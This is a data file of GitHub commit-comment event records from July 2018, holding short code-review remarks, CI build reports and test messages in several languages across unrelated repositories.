{"id":"8021437955","type":"CommitCommentEvent","actor":{"login":"rkrikbaev"},"repo":{"name":"rkrikbaev/tcp-server"},"payload":{"comment":{"id":29840894,"position":null,"line":null,"path":null,"commit_id":"25edbf363da7d92942c5e203c5ba52a3ae4cf47b","created_at":"2018-07-26T09:13:10Z","updated_at":"2018-07-26T09:13:10Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-26T09:13:10Z"}
{"id":"8021438108","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29840895,"position":75,"line":58,"path":"tests/TicTacToeTest.php","commit_id":"1fe8501de16f4b6fd3220c9d79a4190b04468162","created_at":"2018-07-26T09:13:12Z","updated_at":"2018-07-26T09:13:12Z","author_association":"OWNER","body":"Because all the magic happens into playGame () method. As it can be seen, changes happen after the $game->playGame () call. This is the only method a user needs to know. It may be the only one public method for the Game class. After configuration (input, data stored in sessions (NOT), or a file, or a database, whatever) one methhod is called. The player's move resides deep into the Game and Player implementations. Most of the methods do not return anything. Because of that, It's hard (to me) to think at testing them. That's why I created methods that return something, return states of the game before and after moves.\r\n\r\nI hoped another tests, unit tests, will clarify everithing. But now I will create another branch named 'inspiration' with the actual code. If you consider I should abandon it, I will. Otherwise, I need tips for how to write tests for that."}},"created_at":"2018-07-26T09:13:12Z"}
{"id":"8021440358","type":"CommitCommentEvent","actor":{"login":"venkatmalapati1"},"repo":{"name":"venkatmalapati1/fast-track"},"payload":{"comment":{"id":29840903,"position":null,"line":null,"path":null,"commit_id":"9296c8b7c87a5360174dfb9023710615dedd808a","created_at":"2018-07-26T09:13:37Z","updated_at":"2018-07-26T09:13:37Z","author_association":"OWNER","body":"fbfb fdb "}},"created_at":"2018-07-26T09:13:37Z"}
{"id":"8021441094","type":"CommitCommentEvent","actor":{"login":"selestaingegneria"},"repo":{"name":"selestaingegneria/appinventor-sources"},"payload":{"comment":{"id":29840905,"position":null,"line":null,"path":null,"commit_id":"6690bb8acf65bb8d2af26d876d1a90e739b34799","created_at":"2018-07-26T09:13:45Z","updated_at":"2018-07-26T09:13:45Z","author_association":"OWNER","body":"FIX unknown option for aapt program --no-version-vectors"}},"created_at":"2018-07-26T09:13:45Z"}
{"id":"8021442407","type":"CommitCommentEvent","actor":{"login":"smortex"},"repo":{"name":"opus-codium/melt"},"payload":{"comment":{"id":29840911,"position":null,"line":null,"path":null,"commit_id":"57237646216d83ec07fde7b702fc6a75abd58d8c","created_at":"2018-07-26T09:14:01Z","updated_at":"2018-07-26T09:14:01Z","author_association":"MEMBER","body":"These changes where never released… We (@ipaddress-gem) should probably [fill-in an issue](http://help.rubygems.org/discussions/problems#new-discussion-form) on rubygems.org to be able to release a new version…\r\n\r\nOr we (@opus-codium) may switch to Ruby's [IPAddr](https://ruby-doc.org/stdlib-2.5.1/libdoc/ipaddr/rdoc/IPAddr.html) class."}},"created_at":"2018-07-26T09:14:01Z"}
{"id":"8021446942","type":"CommitCommentEvent","actor":{"login":"azag0"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":29840923,"position":null,"line":null,"path":null,"commit_id":"110fe00e2100602d63138aa7cf78e278d389272a","created_at":"2018-07-26T09:14:53Z","updated_at":"2018-07-26T09:14:53Z","author_association":"CONTRIBUTOR","body":"@fxcoudert Is it correct that since this commit, it is not possible to `install scalapack -s` when one has MPICH installed instead of Open MPI?"}},"created_at":"2018-07-26T09:14:53Z"}
{"id":"8021447618","type":"CommitCommentEvent","actor":{"login":"roidayan"},"repo":{"name":"roidayan/lnst-hw-offload-config"},"payload":{"comment":{"id":29840925,"position":null,"line":null,"path":null,"commit_id":"a9ec99bf7ba0621f0721caa11d89273c720ec445","created_at":"2018-07-26T09:15:01Z","updated_at":"2018-07-26T09:15:01Z","author_association":"OWNER","body":"So why not reinstalled the broken vm and use same name? Why use a new name now?"}},"created_at":"2018-07-26T09:15:01Z"}
{"id":"8021449249","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29840933,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-26T09:15:19Z","updated_at":"2018-07-26T09:15:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T09:15:19Z"}
{"id":"8021452631","type":"CommitCommentEvent","actor":{"login":"mohancm"},"repo":{"name":"DotOS/android_packages_apps_Dialer"},"payload":{"comment":{"id":29840941,"position":null,"line":null,"path":null,"commit_id":"d368a016b5aac3cd9ba57ed13b0dd1f4a5f782f0","created_at":"2018-07-26T09:15:57Z","updated_at":"2018-07-26T09:15:57Z","author_association":"MEMBER","body":"When this happened before?\r\nAbout accusion, yeah everything has accusion.some peps blame for everything what we do.\r\nI don't what's wrong with them. If you go through it properly, you will find the truth. :)\r\n"}},"created_at":"2018-07-26T09:15:57Z"}
{"id":"8021455448","type":"CommitCommentEvent","actor":{"login":"gudrb"},"repo":{"name":"gudrb/crawling"},"payload":{"comment":{"id":29840948,"position":null,"line":null,"path":null,"commit_id":"b1fe1175edb3ecdce84edd052b27d2ac0a1d3ba0","created_at":"2018-07-26T09:16:27Z","updated_at":"2018-07-26T09:16:27Z","author_association":"OWNER","body":"ㅁㄴㄴㄴ"}},"created_at":"2018-07-26T09:16:27Z"}
{"id":"8021457950","type":"CommitCommentEvent","actor":{"login":"roidayan"},"repo":{"name":"roidayan/lnst-hw-offload-config"},"payload":{"comment":{"id":29840951,"position":null,"line":null,"path":null,"commit_id":"60bfa4da202276b6883da4ca2d2f9131d1361551","created_at":"2018-07-26T09:16:57Z","updated_at":"2018-07-26T09:16:57Z","author_association":"OWNER","body":"Why you say you check ofed 4.4 ? You are not checking ofed version at all. You check devlink compat location"}},"created_at":"2018-07-26T09:16:57Z"}
{"id":"8021459285","type":"CommitCommentEvent","actor":{"login":"PippaC"},"repo":{"name":"ceciliachoi/SecureGateway"},"payload":{"comment":{"id":29840955,"position":null,"line":null,"path":null,"commit_id":"6b13cabf78f1153119da80e9cc0403fe1171b3f7","created_at":"2018-07-26T09:17:10Z","updated_at":"2018-07-26T09:17:10Z","author_association":"NONE","body":"Rephrase the sentence a bit to `If the number of requests exceeds the limit, it can result in the connection attempts being rejected and lead to latency.`"}},"created_at":"2018-07-26T09:17:10Z"}
{"id":"8021462581","type":"CommitCommentEvent","actor":{"login":"WebMad"},"repo":{"name":"WebMad/newspaperMM"},"payload":{"comment":{"id":29840959,"position":53,"line":170,"path":"application/controllers/Panel.php","commit_id":"c5afdf337343e43dd4d66444cd29e9dc06e75200","created_at":"2018-07-26T09:17:47Z","updated_at":"2018-07-26T09:17:47Z","author_association":"OWNER","body":"как и обещал)"}},"created_at":"2018-07-26T09:17:47Z"}
{"id":"8021468725","type":"CommitCommentEvent","actor":{"login":"zy4"},"repo":{"name":"proteinevolution/Toolkit"},"payload":{"comment":{"id":29840974,"position":8,"line":13,"path":"conf/base.conf","commit_id":"6b93f555843d92ea7528e2519d6e4489157a56b6","created_at":"2018-07-26T09:18:56Z","updated_at":"2018-07-26T09:18:56Z","author_association":"MEMBER","body":"we actually do not use netty at all (only built in in reactivemongo), so the config can go."}},"created_at":"2018-07-26T09:18:56Z"}
{"id":"8021469761","type":"CommitCommentEvent","actor":{"login":"mr-ubik"},"repo":{"name":"zurutech/gans-from-theory-to-production"},"payload":{"comment":{"id":29840976,"position":null,"line":null,"path":null,"commit_id":"23ec585babffa2d64e93f82ed43a7acfbabcb601","created_at":"2018-07-26T09:19:07Z","updated_at":"2018-07-26T09:19:07Z","author_association":"MEMBER","body":"Closes #1 "}},"created_at":"2018-07-26T09:19:07Z"}
{"id":"8021477182","type":"CommitCommentEvent","actor":{"login":"eringh"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29840997,"position":null,"line":null,"path":null,"commit_id":"59b2c1285d08c953525418fd986ed6e40c415598","created_at":"2018-07-26T09:20:26Z","updated_at":"2018-07-26T09:20:26Z","author_association":"CONTRIBUTOR","body":"In the end I just went for vectorizing the final result, 71177815efbb511359d5ea893651db1e94a16092"}},"created_at":"2018-07-26T09:20:26Z"}
{"id":"8021479297","type":"CommitCommentEvent","actor":{"login":"gagandeepb"},"repo":{"name":"gagandeepb/Frames-beam"},"payload":{"comment":{"id":29841003,"position":32,"line":81,"path":"src/UsageExample.hs","commit_id":"1a213e4198128582ae1383de4d224983b7fb97cf","created_at":"2018-07-26T09:20:49Z","updated_at":"2018-07-26T09:20:49Z","author_association":"OWNER","body":"Have replied on the [issue thread](https://github.com/gagandeepb/Frames-beam/issues/9) regarding unit tests."}},"created_at":"2018-07-26T09:20:49Z"}
{"id":"8021491872","type":"CommitCommentEvent","actor":{"login":"Jackiexp"},"repo":{"name":"Jackiexp/Mvp"},"payload":{"comment":{"id":29841017,"position":30,"line":25,"path":"MvpTest/app/src/main/java/com/example/jackie/mvptest/app/component/AppComponent.java","commit_id":"34811f5f3e28a9bf4459ae41b98bf529a7866c4a","created_at":"2018-07-26T09:23:10Z","updated_at":"2018-07-26T09:23:10Z","author_association":"OWNER","body":"获取RetrofitService"}},"created_at":"2018-07-26T09:23:10Z"}
{"id":"8021493806","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29841018,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-26T09:23:32Z","updated_at":"2018-07-26T09:23:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T09:23:32Z"}
{"id":"8021495497","type":"CommitCommentEvent","actor":{"login":"SoftIvan"},"repo":{"name":"SoftIvan/LonelySiberia"},"payload":{"comment":{"id":29841021,"position":1,"line":1,"path":"fuck.txt","commit_id":"9b5068e6ab6d5ca11cc123136aeeca90efcb7f5f","created_at":"2018-07-26T09:23:52Z","updated_at":"2018-07-26T09:23:52Z","author_association":"OWNER","body":"you are fuckin mad sucker"}},"created_at":"2018-07-26T09:23:52Z"}
{"id":"8021496096","type":"CommitCommentEvent","actor":{"login":"markov-r"},"repo":{"name":"Best-Style-Company-web-site/best-style-ltd"},"payload":{"comment":{"id":29841023,"position":null,"line":null,"path":null,"commit_id":"81abf1dcea0523c70e28df07979005149c8f52f0","created_at":"2018-07-26T09:23:59Z","updated_at":"2018-07-26T09:23:59Z","author_association":"CONTRIBUTOR","body":"User Class added."}},"created_at":"2018-07-26T09:23:59Z"}
{"id":"8021499155","type":"CommitCommentEvent","actor":{"login":"wangxiu6225"},"repo":{"name":"wangxiu6225/myfiles"},"payload":{"comment":{"id":29841030,"position":null,"line":null,"path":null,"commit_id":"9071083eae0da11de0d9e6717e66759ffe5227ba","created_at":"2018-07-26T09:24:33Z","updated_at":"2018-07-26T09:24:33Z","author_association":"OWNER","body":"找加删除的文件"}},"created_at":"2018-07-26T09:24:33Z"}
{"id":"8021503172","type":"CommitCommentEvent","actor":{"login":"Kumar89H"},"repo":{"name":"kifukt/mealfriend"},"payload":{"comment":{"id":29841038,"position":5,"line":42,"path":"app/controllers/diaries_controller.rb","commit_id":"99e3b7704c79827993a6baa3a0da8d517267d0e5","created_at":"2018-07-26T09:25:17Z","updated_at":"2018-07-26T09:25:17Z","author_association":"NONE","body":"user id will change"}},"created_at":"2018-07-26T09:25:17Z"}
{"id":"8021527277","type":"CommitCommentEvent","actor":{"login":"khaledhosny"},"repo":{"name":"adobe-type-tools/afdko"},"payload":{"comment":{"id":29841073,"position":null,"line":null,"path":null,"commit_id":"ac6ec315271f88b90e8a788b5851bb1fcd4489f2","created_at":"2018-07-26T09:29:49Z","updated_at":"2018-07-26T09:29:49Z","author_association":"COLLABORATOR","body":"I’m just wondering why autohint specifically, given that some of these cleanups might have happened in psautohint already."}},"created_at":"2018-07-26T09:29:49Z"}
{"id":"8021528326","type":"CommitCommentEvent","actor":{"login":"DaltonHarvey"},"repo":{"name":"DaltonHarvey/activity"},"payload":{"comment":{"id":29841074,"position":1,"line":1,"path":"README.md","commit_id":"00a8f69980bb15b0181745ae239a7af95335a6c8","created_at":"2018-07-26T09:29:59Z","updated_at":"2018-07-26T09:29:59Z","author_association":"OWNER","body":".`kuh`"}},"created_at":"2018-07-26T09:29:59Z"}
{"id":"8021537304","type":"CommitCommentEvent","actor":{"login":"dl1ksv"},"repo":{"name":"haakov/gnuradio"},"payload":{"comment":{"id":29841095,"position":6,"line":59,"path":"gr-filter/grc/filter_root_raised_cosine_filter.block.yml","commit_id":"bf16d0b1a4c91bee2cb662ccfa5787d2725f2232","created_at":"2018-07-26T09:31:36Z","updated_at":"2018-07-26T09:31:36Z","author_association":"NONE","body":"I think there is a literal  error in line 59. The : before \\n should be removed. "}},"created_at":"2018-07-26T09:31:36Z"}
{"id":"8021538801","type":"CommitCommentEvent","actor":{"login":"MorrisJobke"},"repo":{"name":"DrRSatzteil/documentmanager"},"payload":{"comment":{"id":29841096,"position":11,"line":9,"path":"lib/Database/OrganisationMapper.php","commit_id":"ce66e5c0b5e41177c5d46cf71b812f42c0ed80e6","created_at":"2018-07-26T09:31:53Z","updated_at":"2018-07-26T09:31:53Z","author_association":"NONE","body":"> where it was stated that the IDbConnection class was deprecated and should be replaced by OC\\DB\\Connection.\r\n\r\nIt said move away from `OCP\\IDb` and towards `OCP\\IDbConnection` ;) And `OC\\DB\\Connection` is the specific implementation of this in the private namespace."}},"created_at":"2018-07-26T09:31:53Z"}
{"id":"8021539787","type":"CommitCommentEvent","actor":{"login":"egov-systems"},"repo":{"name":"egovernments/egov-smartcity-suite"},"payload":{"comment":{"id":29841098,"position":66,"line":1702,"path":"egov/egov-pgr/src/main/java/org/egov/pgr/elasticsearch/service/ComplaintIndexService.java","commit_id":"16e6d775040e039a242cace7e58f500c7c93eab0","created_at":"2018-07-26T09:32:03Z","updated_at":"2018-07-26T09:32:03Z","author_association":"CONTRIBUTOR","body":"Avoid unecessary variable assigments, change it to feedbackResponse.setMonthlyCounts(getMonthlyFeedbackCount(closedBucket));"}},"created_at":"2018-07-26T09:32:03Z"}
{"id":"8021543325","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29841101,"position":75,"line":58,"path":"tests/TicTacToeTest.php","commit_id":"1fe8501de16f4b6fd3220c9d79a4190b04468162","created_at":"2018-07-26T09:32:41Z","updated_at":"2018-07-26T09:32:41Z","author_association":"NONE","body":"You don't write tests for the code, you write meaningful tests, and then the code for that. I don't care what you had in the past, I guide you in a certain way, you have to follow what I tell you.\r\n\r\nTest should look like this:\r\n\r\n```\r\n$playerX = new Player(new Mark('X'));\r\n$player0 = new Player(new Mark('0'));\r\n$map = new Map(...);\r\n$game = new Game($playerX, $player0, $map);\r\n$playerX->...(0, 0);\r\n$player0->...(1, 0);\r\n$playerX->...(0, 1);\r\n$player0->...(1, 1);\r\n$this->assert(... winner is none ...);\r\n$playerX->...(0, 2);\r\n$this->assert(... winner is X ...);```\r\n\r\nYou literally have to do 0 thinking, just to fill out a few characters instead of the .... placeholders.\r\n\r\nAnd THIS would be a proper test."}},"created_at":"2018-07-26T09:32:41Z"}
{"id":"8021543643","type":"CommitCommentEvent","actor":{"login":"lansedefeixiang"},"repo":{"name":"lansedefeixiang/win1"},"payload":{"comment":{"id":29841103,"position":null,"line":null,"path":null,"commit_id":"64e60fff018a24062085134fd3877181d5e3b834","created_at":"2018-07-26T09:32:45Z","updated_at":"2018-07-26T09:32:45Z","author_association":"OWNER","body":"这是一个美丽的星期四"}},"created_at":"2018-07-26T09:32:45Z"}
{"id":"8021547376","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29841117,"position":13,"line":13,"path":"M-2/01_months.rb","commit_id":"ffac2ad391f8316183c4e778ff8d7174f2681ac1","created_at":"2018-07-26T09:33:26Z","updated_at":"2018-07-26T09:33:26Z","author_association":"NONE","body":"ключи внутри хэша должны быть проиндентированны на 2 пробела от начала строки."}},"created_at":"2018-07-26T09:33:26Z"}
{"id":"8021547704","type":"CommitCommentEvent","actor":{"login":"hao5119266"},"repo":{"name":"hao5119266/PAT-"},"payload":{"comment":{"id":29841119,"position":null,"line":null,"path":null,"commit_id":"7a979831716125fcc321d4272422e204f8c35bc6","created_at":"2018-07-26T09:33:29Z","updated_at":"2018-07-26T09:33:29Z","author_association":"OWNER","body":"1001 害死人不偿命的(3n+1)猜想 (15)（15 分）提问\r\n卡拉兹(Callatz)猜想：\r\n\r\n对任何一个自然数n，如果它是偶数，那么把它砍掉一半；如果它是奇数，那么把(3n+1)砍掉一半。这样一直反复砍下去，最后一定在某一步得到n=1。卡拉兹在1950年的世界数学家大会上公布了这个猜想，传说当时耶鲁大学师生齐动员，拼命想证明这个貌似很傻很天真的命题，结果闹得学生们无心学业，一心只证(3n+1)，以至于有人说这是一个阴谋，卡拉兹是在蓄意延缓美国数学界教学与科研的进展……\r\n\r\n我们今天的题目不是证明卡拉兹猜想，而是对给定的任一不超过1000的正整数n，简单地数一下，需要多少步（砍几下）才能得到n=1？\r\n\r\n输入格式：每个测试输入包含1个测试用例，即给出自然数n的值。\r\n\r\n输出格式：输出从n计算到1需要的步数。\r\n\r\n输入样例：\r\n\r\n3\r\n输出样例：\r\n\r\n5"}},"created_at":"2018-07-26T09:33:29Z"}
{"id":"8021548914","type":"CommitCommentEvent","actor":{"login":"johnaldis"},"repo":{"name":"dylanbeattie/rockstar"},"payload":{"comment":{"id":29841123,"position":null,"line":null,"path":null,"commit_id":"bc43323992450850692af8ca10772a1c349822e3","created_at":"2018-07-26T09:33:42Z","updated_at":"2018-07-26T09:33:42Z","author_association":"NONE","body":"I've noticed this problem elsewhere in English/Mathematical usage (e.g. \"a length of two by four\" vs \"D Y by D X\") but in this language I'd think learning that the word `by` always represents division would be no problem."}},"created_at":"2018-07-26T09:33:42Z"}
{"id":"8021550624","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29841132,"position":16,"line":16,"path":"M-2/01_months.rb","commit_id":"ffac2ad391f8316183c4e778ff8d7174f2681ac1","created_at":"2018-07-26T09:34:01Z","updated_at":"2018-07-26T09:34:01Z","author_association":"NONE","body":"лучше вместо value написать days. Это лучше отразит суть происходящего"}},"created_at":"2018-07-26T09:34:01Z"}
{"id":"8021553794","type":"CommitCommentEvent","actor":{"login":"BensonRUEI"},"repo":{"name":"BensonRUEI/Librenms-Install-Shell"},"payload":{"comment":{"id":29841137,"position":null,"line":null,"path":null,"commit_id":"3e2962aec77ab33864188e43ee382ced117da7d4","created_at":"2018-07-26T09:34:35Z","updated_at":"2018-07-26T09:34:35Z","author_association":"OWNER","body":"專案說明"}},"created_at":"2018-07-26T09:34:35Z"}
{"id":"8021556503","type":"CommitCommentEvent","actor":{"login":"stefanb"},"repo":{"name":"nabla-c0d3/sslyze"},"payload":{"comment":{"id":29841143,"position":18,"line":464,"path":"sslyze/plugins/certificate_info_plugin.py","commit_id":"fa32ee143ef8e04ac86e97c2f698e19e062a2c97","created_at":"2018-07-26T09:35:07Z","updated_at":"2018-07-26T09:35:07Z","author_association":"NONE","body":"It could be helpful to indicate that more details could be provided if openssl was upgraded by adding eg \" (details unknown due to too old version of openssl)\" or  \" (details require openssl version X or later)\""}},"created_at":"2018-07-26T09:35:07Z"}
{"id":"8021558067","type":"CommitCommentEvent","actor":{"login":"Volodymyr2208"},"repo":{"name":"Volodymyr2208/StandUp"},"payload":{"comment":{"id":29841149,"position":null,"line":null,"path":null,"commit_id":"e5be275aeeaf9afed167e4ab7ae8c1cd724ab0ef","created_at":"2018-07-26T09:35:23Z","updated_at":"2018-07-26T09:35:23Z","author_association":"OWNER","body":"Cool, keep in such way."}},"created_at":"2018-07-26T09:35:23Z"}
{"id":"8021559354","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29841152,"position":4,"line":4,"path":"M-2/02_array.rb","commit_id":"ffac2ad391f8316183c4e778ff8d7174f2681ac1","created_at":"2018-07-26T09:35:37Z","updated_at":"2018-07-26T09:35:37Z","author_association":"NONE","body":"Так мы проверяем каждый элемент рэйнджа. А нам нужно каждый пятый только. Стоит посмотреть в сторону метода step"}},"created_at":"2018-07-26T09:35:37Z"}
{"id":"8021559947","type":"CommitCommentEvent","actor":{"login":"EliasKotlyar"},"repo":{"name":"Dafang-Hacks/spiflasher"},"payload":{"comment":{"id":29841155,"position":null,"line":null,"path":null,"commit_id":"f83942722415dd87027365726a62a74d06d7602f","created_at":"2018-07-26T09:35:44Z","updated_at":"2018-07-26T09:35:44Z","author_association":"CONTRIBUTOR","body":"Yeah, hook it up to serial and check. It should be booting from the SDCard, because of the blue light. I suppose there may be an issue with WIFI. \r\n\r\n>Do I need to do the dd if=/dev/zero of=fullflash.bin bs=1 count=1 seek=16777215 to the binary like >indicated in the instructions in this repo?\r\nNo. Its only for padding the u-boot binary to the size of the 16MB. Flashrom wont flash any binary which does not have the exact same size. To avoid the whole flash being rewritten, there is this mapping with rom.layout. It will just flash the uboot and avoid anything else.\r\n"}},"created_at":"2018-07-26T09:35:44Z"}
{"id":"8021560355","type":"CommitCommentEvent","actor":{"login":"r10s"},"repo":{"name":"deltachat/deltachat-node"},"payload":{"comment":{"id":29841156,"position":null,"line":null,"path":null,"commit_id":"7e89ed1df216d709c8d0d8bf253c96e631e4ff53","created_at":"2018-07-26T09:35:48Z","updated_at":"2018-07-26T09:35:48Z","author_association":"MEMBER","body":"you did it \\o/ \\o/ \\o/ \\o/ juuu-hoooo \\o/ \\o/ \\o/ \\o/ build-passing ..."}},"created_at":"2018-07-26T09:35:48Z"}
{"id":"8021564210","type":"CommitCommentEvent","actor":{"login":"NearMugi"},"repo":{"name":"NearMugi/NefrySample"},"payload":{"comment":{"id":29841166,"position":null,"line":null,"path":null,"commit_id":"ec19619130782213451f4df9b2458a331823b224","created_at":"2018-07-26T09:36:32Z","updated_at":"2018-07-26T09:36:32Z","author_association":"OWNER","body":"参考URLは\r\n**http://frchick.blog129.fc2.com/blog-entry-627.html**\r\nが正解。"}},"created_at":"2018-07-26T09:36:32Z"}
{"id":"8021564662","type":"CommitCommentEvent","actor":{"login":"Adorfer"},"repo":{"name":"freifunk-gluon/gluon"},"payload":{"comment":{"id":29841167,"position":null,"line":null,"path":null,"commit_id":"8395c08e667ab4eff86c8dfc3c5af6c36a16b2f4","created_at":"2018-07-26T09:36:36Z","updated_at":"2018-07-26T09:36:36Z","author_association":"CONTRIBUTOR","body":"Just a hint: there is a C50v4(EU) now: \r\n\r\n![grafik](https://user-images.githubusercontent.com/10302493/43254647-23d45178-90c8-11e8-836a-9d52af24ee50.png)\r\n"}},"created_at":"2018-07-26T09:36:36Z"}
{"id":"8021569998","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29841183,"position":null,"line":null,"path":null,"commit_id":"42d8b1b147cff3f626d0768cb44dc1a8be156873","created_at":"2018-07-26T09:37:34Z","updated_at":"2018-07-26T09:37:34Z","author_association":"NONE","body":"158270028_Issue#6422 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2326 of 2326 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.21%25-green.png)</a>\n"}},"created_at":"2018-07-26T09:37:34Z"}
{"id":"8021572161","type":"CommitCommentEvent","actor":{"login":"andre-kraus"},"repo":{"name":"shopgate/cloud-integration-magento"},"payload":{"comment":{"id":29841192,"position":14,"line":83,"path":"src/app/code/community/Shopgate/Cloudapi/Helper/Preflight.php","commit_id":"b6d613b2ef3cdd6387cd0e6fe847e0e789885147","created_at":"2018-07-26T09:37:57Z","updated_at":"2018-07-26T09:37:57Z","author_association":"MEMBER","body":"Do we need PUT here? You switched to POST, right?"}},"created_at":"2018-07-26T09:37:57Z"}
{"id":"8021572840","type":"CommitCommentEvent","actor":{"login":"waiwaiku"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29841193,"position":null,"line":null,"path":null,"commit_id":"00afce3a4bf3085fe8309435a03d2597a519bef8","created_at":"2018-07-26T09:38:06Z","updated_at":"2018-07-26T09:38:06Z","author_association":"NONE","body":"components/date-picker/RangePicker.tsx\r\nTag标签请预留 prefixCls 属性配置"}},"created_at":"2018-07-26T09:38:06Z"}
{"id":"8021573110","type":"CommitCommentEvent","actor":{"login":"jingxinfan"},"repo":{"name":"Leetsong/HackerNewsAndroid"},"payload":{"comment":{"id":29841195,"position":null,"line":null,"path":null,"commit_id":"670b5c5ed51c83380ac09b0cce2d4ec8d5b924a9","created_at":"2018-07-26T09:38:09Z","updated_at":"2018-07-26T09:38:09Z","author_association":"NONE","body":"QuQ"}},"created_at":"2018-07-26T09:38:09Z"}
{"id":"8021573345","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29841196,"position":4,"line":4,"path":"M-2/03_fibonacci.rb","commit_id":"ffac2ad391f8316183c4e778ff8d7174f2681ac1","created_at":"2018-07-26T09:38:12Z","updated_at":"2018-07-26T09:38:12Z","author_association":"NONE","body":"присваивание записывать в условие всегда плохая идея. Раньше руби даже выкидывал warning'и в таких случаях. Лучше опеределить локальную переменную fibonacci вне цикла, и внутри цикла ее пушить и затем инкрементировать"}},"created_at":"2018-07-26T09:38:12Z"}
{"id":"8021577577","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29841215,"position":5,"line":5,"path":"M-2/04_letters.rb","commit_id":"ffac2ad391f8316183c4e778ff8d7174f2681ac1","created_at":"2018-07-26T09:39:00Z","updated_at":"2018-07-26T09:39:00Z","author_association":"NONE","body":"Вот это - отличная идея!"}},"created_at":"2018-07-26T09:39:00Z"}
{"id":"8021578202","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29841218,"position":null,"line":null,"path":null,"commit_id":"42d8b1b147cff3f626d0768cb44dc1a8be156873","created_at":"2018-07-26T09:39:08Z","updated_at":"2018-07-26T09:39:08Z","author_association":"NONE","body":"158270028_Issue#6422 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T09:39:08Z"}
{"id":"8021579389","type":"CommitCommentEvent","actor":{"login":"MrShoxruxbek"},"repo":{"name":"MrShoxruxbek/fragment"},"payload":{"comment":{"id":29841219,"position":null,"line":null,"path":null,"commit_id":"bf79e3caf5987135e157aeabdde7fc6b2f701298","created_at":"2018-07-26T09:39:20Z","updated_at":"2018-07-26T09:39:20Z","author_association":"OWNER","body":"Not bad, now try to do something a little bit  difficult"}},"created_at":"2018-07-26T09:39:20Z"}
